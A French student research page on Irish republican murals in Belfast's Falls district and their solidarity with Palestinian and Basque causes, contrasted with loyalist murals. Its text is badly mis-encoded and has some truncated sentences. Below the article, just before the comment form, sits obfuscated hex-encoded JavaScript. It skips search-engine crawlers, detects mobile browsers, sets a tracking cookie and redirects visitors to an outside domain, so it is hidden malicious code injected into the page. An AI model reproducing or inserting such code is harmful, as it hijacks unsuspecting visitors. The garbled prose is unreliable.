RA�sultats de la recherche – SolidaritA� Internationale

Mesure de la solidaritA� internationale des rA�publicains irlandais

Au niveau spatial, les quartiers dA�finis et habitA�s par une population exclusivement irlandaise ou anglaise, qui sont souvent de classes dA�favorisA�es, sont ceux qui comportent le plus de murals. Les symboles internationaux que l’on peut dA�celer dans l’espace public se trouvent avant tout dans le quartier nationaliste de Falls, un quartier irlandais, A� travers notamment les murals de l’A�A�International WallA�A�. Si les quartiers loyalistes ont eux aussi beaucoup de murals, ils ne font pas rA�fA�rence A� des conflits internationaux, seule une trA?s grande pancarte sur un mur fait rA�fA�rence A� IsraA�l dans le quartier de Shankill. Cela montre que ce sont les rA�publicains irlandais qui ont lancA� un processus d’internationalisation du conflit qui selon Pascal PragnA?re (2009, 2014) a notamment pour fonction de lA�gitimer la lutte rA�publicaine et d’accroA�tre la mobilisation, par le biais de la crA�ation da��identitA�s communes entre les diffA�rents acteurs du conflit. En effet, les rA�fA�rences aux autres luttes permettent une certaine reprA�sentation du conflit contribuant A� marquer la position d’oppressA�s et de victimes des Irlandais. Elles participent ainsi A� renforcer le sentiment d’appartenance A� une communautA� particuliA?re. Enfin les murals, toujours selon Pascal PragnA?re (2009) ont une fonction d’appropriation territoriale, de A�A�marquageA�A� d’un quartier comme appartenant A� une communautA�, A� un camp.

Dans le quartier de Falls, des messages de solidaritA� envers des causes A� l’A�tranger, entre autres pour la Palestine, le Pays Basque ou encore les Kurdes sont diffusA�s A� travers les murals. On trouve A�galement des boutiques vendant toutes sortes de symboles irlandais mais aussi palestiniens et basques par exemple. A premiA?re vue donc, les rA�publicains irlandais semblent soutenir a�� au moins symboliquement a�� toute cause qu’ils considA?rent comme ayant des similitudes avec la leur, c’est A� dire concernant des mouvements politiques et/ou sociaux qui se battent pour leur libA�ration, leur dignitA�.

La question que l’on peut dA?s lors se poser, est de savoir si ces manifestations de solidaritA� s’arrA?tent A� un message symbolique ou si ces signaux visibles dans l’espace public sont suivis d’une relation et da��un soutien plus concrets entre les acteurs Nord-Irlandais et ceux des autres causes qu’ils dA�signent par leur murals, ce sur quoi nous reviendrons plus loin. Il est dA�jA� A�vident, au regard des murals et des articles symboliques trouvA�s dans des magasins ou des musA�es, que certaines causes sont d’avantage supportA�es que d’autres, dans un premier temps, toujours symboliquement. Le drapeau palestinien se retrouve dans tous les magasins pro rA�publicains, ainsi qu’aux fenA?tres de maisons privA�es. La Palestine fait par ailleurs l’objet de deux peintures murales sur l’International Wall au moment de notre enquA?te, alors que les autres causes ne font pas l’objet de doublon. L’un de ces mural est par ailleurs trA?s significatif symboliquementA�:

Solidarity p.o.w.s, Falls Road, Lucien Rappaz, le 01.03.2016
Solidarity p.o.w.s, Falls Road, Lucien Rappaz, le 01.03.2016

Cette peinture murale fait partie de la��International Wall qui est un lieu de tourisme en Irlande du Nord, il regroupe plusieurs murals A� la suite concernant des conflits internationaux. Elle na��est pas toute rA�cente puisqua��elle apparaissait dA�jA� dans le documentaire da��Hassan Alkatib de dA�cembre 2014, nommA� Ireland & Palestine. Ici la similitude entre cause palestinienne et rA�publicaine irlandaise est directement exprimA�e, car les deux sont reprA�sentA�es en un seul mural. Une ouverture carrA�e avec trois barreaux reprA�sente des cellules de prison. Deux bras, habillA�s de chemise, passent entre les barreaux en se donnant la main au milieu du mural. On reconnaA�t l’appartenance A� la nationalitA� irlandaise et la nationalitA� palestinienne aux couleurs des manches, A�quivalentes aux couleurs du drapeau de la��Irlande (vert-blanc-orange) et le drapeau de la Palestine (vert-blanc-noir-rouge).A� Les deux personnages sont exactement mis sur le mA?me plan, et se trouvent prA�cisA�ment dans la mA?me situationA�: emprisonnA�s. Au-dessous de la poignA�e de main, est inscrit SOLIDARITE P.O.W.s. Cet acronyme A�A�P.O.W.sA�A� signifie A�A�Prisonnier de guerreA�A� (Prisoner Of War). Cette inscription place trA?s clairement la��Irlande du Nord et la Palestine du cA?tA� des victimes. Le mural transmet un sentiment de solidaritA� entre les deux peuples opprimA�s, ces deux bras de prisonniers de guerre emprisonnA�s dans leurs cellules sortent un bras pour se serrer la main. Nous interprA�tons la prise de main ferme comme un soutien mutuel qui se dA�gage de la fresque. Le dessin reprA�sente les cellules comme si elles A�taient la��une A� cA?tA� de la��autre. Si un lA�ger trait et quelques boulons semblent dissocier deux bA?timents, le fond gris, sans interruption semble au contraire laisser penser que ces deux prisons n’en font qu’une. Alors que les pays sont trA?s A�loignA�s, on peut interprA�ter que malgrA� la distance gA�ographique leurs causes communes les rapprochent ainsi que leur mA?me sentiment da��injustice et da��oppression.

Nous na��avons pas pu le prouver scientifiquement mais nous pouvons nous interroger sur le fait de savoir si cette fresque n’aurait pas pour fonction de renforcer la mA�moire collective des Nord-Irlandais, car une partie d’entre eux pourraient se reconnaA�tre dans la cause palestinienne en la regardant. Da��aprA?s la��interview da��un chauffeur de Black Cab, la communautA� est souvent impliquA�e dans la conception et la��emplacement de ces murals, les artistes les crA�ent avec la��accord de la communautA�, cela nous confirme qua��il y a une connaissance de la part de certains habitants, tout au moins, des conflits internationaux et une volontA� de leur part de les reprA�senter sur un support mural durable dans le temps, jusqua��A� A?tre recouvert par des conflits plus actuels.

A�Au-delA� da��une solidaritA� symbolique

Outre cette solidaritA� exprimA�e symboliquement, on trouve un magasin totalement dA�diA� A� la cause palestinienne sur Falls road, ce qui n’est pas le cas pour les Basques, Catalans ou autres luttes de libA�ration. Les produits vendus dans cette boutique sont importA�s de Palestine, il s’agit en gA�nA�ral de produits artisanaux typiques, tels que de l’huile d’olive ou du savon. Cela montre qu’il existe des initiatives de soutien concret A� la Palestine, ici un soutien A�conomique. Par ailleurs, il existe un A�change rA�el entre les diffA�rents acteurs autour de ces produits. En effet, non seulement le magasin commande des produits palestiniens, mais les Palestiniens eux-mA?mes produisent A�galement des articles qui pourraient plaire aux Irlandais, par exemple des bijoux aux symboles celtiques. Il y a lA� une hybridation dans la mesure oA? certains de ces bijoux sont fait en bois da��olivier et reprA�sentent des symboles celtiques.

A�Notons toutefois que c’est le seul magasin visible qui serve de soutien A�conomique concret. A priori, on pourrait en dA�duire que ces autres boutiques ont avant tout une fonction touristique, commerciale, et par consA�quent, cela laisse penser que les initiatives de soutien matA�riel A� d’autres causes restent rares. En revanche, la prA�sence de tous ces magasins participe A� un message politique en faveur de la cause rA�publicaine et d’autres causes internationales par la symbolique des produits qu’ils vendent. Certains articles tels que des t-shirts affichent des messages trA?s explicites tels que A�A�free PalestineA�A�. Par ailleurs, dans trois magasins visitA�s sur quatre, rA�publicains ou loyalistes distribuent ou vendent des journaux de propagande. Les journaux de propagandes semblent avoir pour rA?le de maintenir les tensions entre loyalistes et rA�publicains, bien que le conflit armA� ait pris fin. Toutefois, en dehors du journal A�A�Aqsa NewsA�A� (cela fait rA�fA�rence A� la mosquA�e Al Aqsa situA�e sur le Mont du Temple ou Esplanade des MosquA�es dans la vieille ville de JA�rusalem) distribuA� chez CeiliA?r an Choilm (magasin dA�diA� aux produits palestiniens), aucun d’entre eux ne met l’accent sur les questions internationales. La plupart des articles ont plutA?t tendance A� se tourner vers des A�vA�nements passA�s. En somme, les magasins semblent donc jouer un rA?le important dans la diffusion du message politique des rA�publicains irlandais.

Les magasins diffusant un message politique sont tenus par des personnes gA�nA�ralement engagA�es, ou du moins intA�ressA�es de prA?s A� la politique. Dans deux cas sur trois les personnes prA�sentes dans ces magasins rA�publicains expriment une trA?s forte solidaritA�, notamment envers la cause palestinienne mais aussi la cause basque. Tous considA?rent le peuple irlandais oppressA� au mA?me titre que le peuple palestinien et mentionnent leur volontA� commune d’indA�pendance A� l’A�gard d’un A�tat colonisateur. Ils estiment la cause rA�publicaine trA?s proche de celle des Palestiniens et des Basques. L’un d’entre eux dA�clare d’ailleurs s’A?tre rendu au Pays Basque et souhaite trA?s fortement se rendre en Palestine.

A cA?tA� de la solidaritA� envers la Palestine donc, le Pays Basque est souvent mentionnA� par les acteurs interrogA�s. Nous pouvons supposer que, si les rA�fA�rences A� l’indA�pendantisme basque sont moins visibles actuellement, cela est probablement dA� au fait que le conflit avec l’Espagne se soit progressivement pacifiA�, alors que la question palestinienne n’est toujours pas rA�solue. Nous trouvons toutefois un mural dA�diA� aux Basques, et en particulier a�� ici encore a�� aux prisonniers politiquesA�:

Free Otegi, Falls Road, Lucien Rappaz, le 01.03.2016
Free Otegi, Falls Road, Lucien Rappaz, le 01.03.2016

 

Ce mural est trA?s spA�cifique car il reprA�sente Arnaldo Otegi, un militant basque emprisonnA� pour des motifs politiques tels que mentionnA�s sur le mural.1 Pour savoir qui est Otegi, il faut avoir une certaine connaissance des A�vA�nements se dA�roulant au Pays Basque, ce qui explique que l’auteur du mural ait accompagnA� l’image d’un texte, afin que des personnes lambda passant devant puissent savoir de qui il s’agit. Sur le mural on reconnaA�t les couleurs basques sur fond noir. La moitiA� da��Otegi est peinte dans ces couleurs, soulignant son origine et son implication pour le Pays Basque. Le poing tendu, il est prA�sentA� comme une figure rA�volutionnaire. Avec un micro devant lui, il est souriant ce qui est plutA?t significatif d’espoir. En somme, on comprend qu’il s’agit d’une personne qui s’investit pour la cause basque et joue un rA?le important pour celle-ci. Un texte accompagne la peinture, quelques mots en basque : A�A�Pake bideanA�A� qui signifie A�A�sur la route de la paixA�A� tel qu’inscrit en anglais A� cA?tA�, le plus gros du message est d’ailleurs dans cette langue, ainsi qu’une phrase en irlandais pour la libA�ration des prisonniers politiques tout en bas. Il y a une rA�pA�tition du mot A� free A�, et donc une insistance sur la libertA�. Comme pour le mural palestinien, les prisonniers politiques basques sont considA�rA�s comme oppressA�s, et on dA�nonce leur emprisonnement. Pour marquer une atteinte A� la libertA� politique, on mentionne un chiffre, celui des 700 prisonniers basques, en France comme en Espagne, dont Otegi est la figure, mais derriA?re lui, il y en a beaucoup da��autres. Cela rappelle que beaucoup da��Irlandais ont eux aussi A�tA� emprisonnA�s. Encore une fois, il y a une mise en avant des similitudes entre la cause rA�publicaine et d’autres, ici la cause basque. Cela peut A�galement rappeler A� la mA�moire des Irlandais, Bobby Sand, qui A�tait un prisonnier politique irlandais et qui est dA�cA�dA� en prison lors da��une grA?ve de la faim.

Comme dit prA�cA�demment, la connaissance d’Otegi demande un intA�rA?t particulier pour la cause basque. MalgrA� le texte accompagnant le mural vu prA�cA�demment, le passant lambda de Falls Road ne semble pas savoir vraiment de qui il s’agit, contrairement A� des personnes plus impliquA�es politiquement, selon diffA�rentes interviews. Cela est probablement le signe que, si solidaritA� il y a entre les rA�publicains irlandais et d’autres luttes au niveau international, celle-ci est surtout maintenue par des personnes qui ont un intA�rA?t important pour la politique et qui sont engagA�es. Un modeste rassemblement de 30 A� 40 personnes a eu lieu A� Belfast le 1er mars 2016, soit le jour de la sortie de prison d’Otegi. Cela dA�montre qu’une implication concrA?te de la communautA� irlandaise pour les luttes au niveau internationale ne peut pas A?tre gA�nA�ralisA�e.

Selon Pascal PragnA?re (2014), les liens entre Basques et Irlandais sont rA�els et sont nA�s de leur cause commune pour l’indA�pendance vis-A�-vis d’un pays tiers (Espagne et Royaume Uni) et qui a eu lieu dans une pA�riode de temps similaire. Au niveau politique, Sinn FA�in (parti rA�publicain) a commencA� A� prendre contact avec les Basques d’Herri Batasuna (parti indA�pendantiste) dans les annA�es 70, de mA?me qu’avec des organisations pro-palestiniennes et anti-apartheid en Afrique du Sud. Toujours selon le mA?me auteur, dA?s lors Basques et Irlandais se sont rA�guliA?rement consultA�s, rencontrA�s, soutenus, et ont partagA�s leurs expA�riences, notamment dans le but d’amA�liorer leur lutte. Cette proximitA� politique s’est diffusA�e par la suite dans d’autres domaines, tels que l’art et le tourismeA�; des A�changes sur lesquels nous reviendrons ultA�rieurement.

Si les liens politiques semblent avA�rA�s, en visitant le site internet officiel du principal parti rA�publicain d’Irlande du Nord, le Sinn FA�in, nous ne trouvons pourtant pas la moindre allusion A� des partis A�A�frA?resA�A� dans d’autres pays, ni aucune nouvelle du dA�roulement da��A�vA�nements dans certaines parties du monde, telle que la Palestine. Les diffA�rentes rubriques se concentrent sur l’actualitA� politique en Irlande du Nord. Soit malgrA� le fait que deux magasins touristiques portent le nom du parti, que l’un d’entre eux, vendant des articles en rA�fA�rences A� d’autres conflits promeuve le site de Sinn FA�in, le lien avec da��autres causes n’est pas affichA�. Est-ce dA� A� un affaiblissement de relations internationalesA�de Sinn FA�in ? Ou a une volontA� de ce parti de se concentrer avant tout sur les politiques Nord-IrlandaisesA�?

A Belfast, l’Irish Republican History Museum, toujours dans le quartier de Falls, a pour but d’informer, notamment la jeunesse, sur l’histoire de la lutte irlandaise pour la libertA�. Il est donc centrA� sur la question des conflits ayant eu lieu avec le Royaume Uni. Pourtant, on y trouve exposA� en premier plan, de maniA?re donc valorisA�e, un prA�sentoir contenant des pins et autres petits objets symboliques oA? sont reprA�sentA�s, au milieu de symboles irlandais et rA�publicains, drapeaux basques, catalans, de la rA�publique espagnole et de brigades enrA?lA�es dans la guerre civile espagnole. (A la��A�poque, de nombreux Irlandais s’A�taient par ailleurs rendus en Espagne pour rejoindre les brigades internationales, et l’Irlande du Nord avait accueilli des rA�fugiA�s espagnols qui sont restA�s par la suite. Soit l’engagement d’Irlandais pour des causes internationales n’est pas rA�cent). On peut interprA�ter la cohabitation de ces diffA�rents symboles dans un mA?me prA�sentoir comme la volontA� de prA�senter ces combats comme similaires. La raison de cette prA�sence s’explique par la mise en place d’un tourisme politique en Irlande du NordA�: ces pins sont des donations laissA�es lA� par les visiteurs, qui comme on le voit, proviennent en particulier des zones indA�pendantistes de l’Espagne. Selon Pascal PragnA?re (2014), il est mA?me possible de suivre des tours politiques en langue basque, ce qui montre donc que ces deux rA�gions du monde ont tissA�s des liens, qui on peut le supposer ici, ont des buts d’A�changes politiques, culturels et A�conomiques. L’auteur montre que les A�changes artistiques et culturels entre Irlandais et Basques se manifestent A�galement A� travers des A�changes d’artistes, crA�ant parfois des murals les uns chez les autres. Dans les deux rA�gions, des organisations de jeunesse ont mis en place des visites dans le pays frA?re, ce qui A�tait souvent la��occasion de peindre de nouveaux murals. Si aujourda��hui la��Irlande du Nord est en processus de paix et si la violence a pris fin au Pays Basque, les liens demeurent et seraient mA?me devenus personnels et familiaux dans certains cas.

Absence de solidaritA� chez les loyalistes. Pourquoi cette diffA�rence ?

Suite A� ces observations, nous sommes en mesure de poser quelques hypothA?ses qui pourraient expliquer cette disparitA� aujourda��hui. La plus aboutie repose sur le contexte historique de la��Irlande du Nord ainsi que de la place dans la��environnement social de chacun des deux groupes. Explorer cette piste nous semble A?tre un bon dA�part dans la comprA�hension de la��asymA�trie que nous avons constatA�. Nous commencerons da��abord par dA�crire le cas loyaliste, puis ensuite le cas rA�publicain.

Le point de vue des loyalistes sur les conflits internationaux est assez simpleA�da��aprA?s nos observations : leur intA�rA?t est relativement faible, les symboles existants ont souvent une signification faible A�galement. A la��exception du Mural IsraA�lien proche de la��International Wall mais de la��autre cA?tA� de la peace line, qui est un hommage aux britanniques par IsraA�l.

Ces A�lA�ments remis dans le cadre du conflit, nous voyons que les loyalistes ont dA� faire face A� une demande da��indA�pendance da��une rA�gion qua��ils considA�raient comme A�tant la leur, et ont ainsi eu besoin de rA�affirmer leur identitA� en tant que citoyens britanniques (Rolston, 1992).A� On trouve dans cette explication A�galement la raison de la plus grande violence des images diffusA�es par les loyalistesA�: les messages de ceux-ci A�tant en accord avec la��ure A�tait quasiment inexistante (Lisle, 2006).

A la��inverse, les rA�publicains, de par leurs intentions sA�cessionnistes, ne pouvaient pas bA�nA�ficier du soutien de la��t donc dA� se rattacher A� des idA�aux transA�tatiques. Le premier thA?me abordA� par les rA�publicains fut donc le socialisme, et particuliA?rement le rattachement au mouvement muraliste mexicain (Lisle, 2006). En partant de cette base, on comprend vite la logique derriA?re la forte internationalisation des murals rA�publicainesA�: il sa��agit de lA�gitimer sa cause en se revendiquant comme peuple oppressA� par les structures politiques en place. Il est A�galement naturel de penser que ce mouvement impactant la��espace public a largement influencA� la perception que les nord-irlandais catholiques ont da��eux-mA?mes et surtout de comment ils se situent par rapport aux autres peuples victimes da��oppression, expliquant ainsi le nombre A�levA� de symboles faisant rA�fA�rence A� la��international dans les divers magasins analysA�s.
Pour rA�sumer, il existe une vraie rA�sonance internationale dans la cause rA�publicaine qui na��existe simplement pas dans la cause loyaliste, cette derniA?re A�tant plus isolA�e (Lisle, 2006). La cause des diffA�rences da��intensitA� dont nous avons A�tA� tA�moins nous semble A?tre donc A� chercher dans les origines de chaque mouvement, mais surtout dans leur volontA� et dans quelle mesure celle-ci rentrait en conflit avec la��autoritA� en place sur le moment.

Retourner A� la page « SolidaritA� Internationale »

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}


Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *